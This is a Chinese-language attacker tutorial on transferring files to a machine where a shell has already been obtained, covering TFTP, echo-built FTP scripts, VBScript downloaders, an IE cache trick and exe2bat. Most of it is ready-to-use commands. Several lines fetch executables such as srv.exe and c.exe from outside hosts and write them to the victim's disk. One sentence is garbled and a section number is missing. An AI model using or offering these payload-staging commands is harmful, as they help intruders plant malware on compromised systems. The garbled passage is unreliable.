本文是居于已經(jīng)得到了一個(gè)有一定權(quán)限的SHELL.命令行下傳送文件的其他方法.  
一，TFTP 
格式：tftp -i get file.exe path/file.exe           默認(rèn)存放在system32下，如果指定就存在指定的地方。 
二：ftp下載文件  
　　ftp下載文件一般步驟如下： 
　　echo open xxx.xxx.xxx.xxx 〉ftp.txt  
　　echo user 〉〉ftp.txt  
　　echo password 〉〉ftp.txt  
　　echo binary 〉〉ftp.txt [可選] 
　　echo get srv.exe 〉〉ftp.txt 
　　echo bye 〉〉ftp.txt  
　　ftp -s:ftp.txt(這一步是關(guān)鍵喲) 
　　del ftp.txt  
　　這樣srv.exe文件拖略諳呂戳?。保证srv.exe已經(jīng)存在指定位置。 
四：寫(xiě)程序下載  
　　腳本是非常好的東西，只要把源碼保存到一個(gè)文件中就能運(yùn)行。所以在shell下，用echo語(yǔ)句直接寫(xiě)到一個(gè)文件中，在用相應(yīng)的解釋程序執(zhí)行就可以啦。這里是一個(gè)程序?qū)嵗暮?jiǎn)化:  
　　echo Set xPost = CreateObject("Microsoft.XMLHTTP") 〉webdown.vbs 
　　echo xPost.Open "GET","http://txhak.126.com/srv.exe",0 〉〉webdown.vbs  
　　echo xPost.Send() 〉〉webdown.vbs  
　　echo Set sGet = CreateObject("ADODB.Stream") 〉〉webdown.vbs  
　　echo sGet.Mode = 3 〉〉webdown.vbs  
　　echo sGet.Type = 1 〉〉webdown.vbs  
　　echo sGet.Open() 〉〉webdown.vbs  
　　echo sGet.Write(xPost.responseBody) 〉〉webdown.vbs 
　　echo sGet.SaveToFile "srv.exe",2 〉〉webdown.vbs  
　　然后執(zhí)行cscript webdown.vbs就可以啦。其中，http://txhak.126.com/srv.exe改成你放文件的網(wǎng)站路徑，srv.exe可以改成保存文件的路徑。 這里ADODB.Stream很重要如果目標(biāo)機(jī)隔離了adodb.stream就會(huì)不成功。 
五：START ITS:HTTP://IP/文件名  
　　然后cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\"  
　　然后DIR 文件名[1]  
　　注意：那串長(zhǎng)文件名要用""引起來(lái)，因?yàn)橛锌崭?nbsp;
　　例子：C:\Documents and Settings\Administrator〉start its:http://xxx.xxx.xxx.xxx/srv. 
　　C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\0AB3MNO1 的目錄  
　　2003-11-22 17:48 12,832 srv[1].exe  
　　1 個(gè)文件 12,832 字節(jié) 
　　列出所有文件:  
　　1 個(gè)文件 12,832 字節(jié)  
　　0 個(gè)目錄 6,425,985,024 可用字節(jié) 
　　C:\Documents and Settings\Administrator〉copy C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\0AB3MNO1\srv[1].exe c:\srv.exe  
　　已復(fù)制 1 個(gè)文件 
六。一句話(huà)下載。第4種方法的精簡(jiǎn)，有時(shí)很有用的 
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://soft.163vv.com/77169/c.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:\c.exe^",2 〉pig.vbs 
七。寫(xiě)程序下載 
echo iLocal = LCase(WScript.Arguments(1)) 〉c:\down.vbs 
echo iRemote = LCase(WScript.Arguments(0)) 〉〉c:\down.vbs 
echo Set xPost = CreateObject("Microsoft.XMLHTTP") 〉〉c:\down.vbs 
echo xPost.Open "GET",iRemote,0 〉〉c:\down.vbs 
echo xPost.Send() 〉〉c:\down.vbs 
echo Set sGet = CreateObject("ADODB.Stream") 〉〉c:\down.vbs 
echo sGet.Mode = 3 〉〉c:\down.vbs 
echo sGet.Type = 1 〉〉c:\down.vbs 
echo sGet.Open() 〉〉c:\down.vbs 
echo sGet.Write(xPost.responseBody) 〉〉c:\down.vbs 
echo sGet.SaveToFile iLocal,2 〉〉c:\down.vbs 
八.exe2bat命令行下輸入，debug還原成文件 
用exe2bat這個(gè)工具把exe文件轉(zhuǎn)化成bat，然后一行行敲進(jìn)去，這樣工作量非常大，只適合于非常短小的文件。 

最新評(píng)論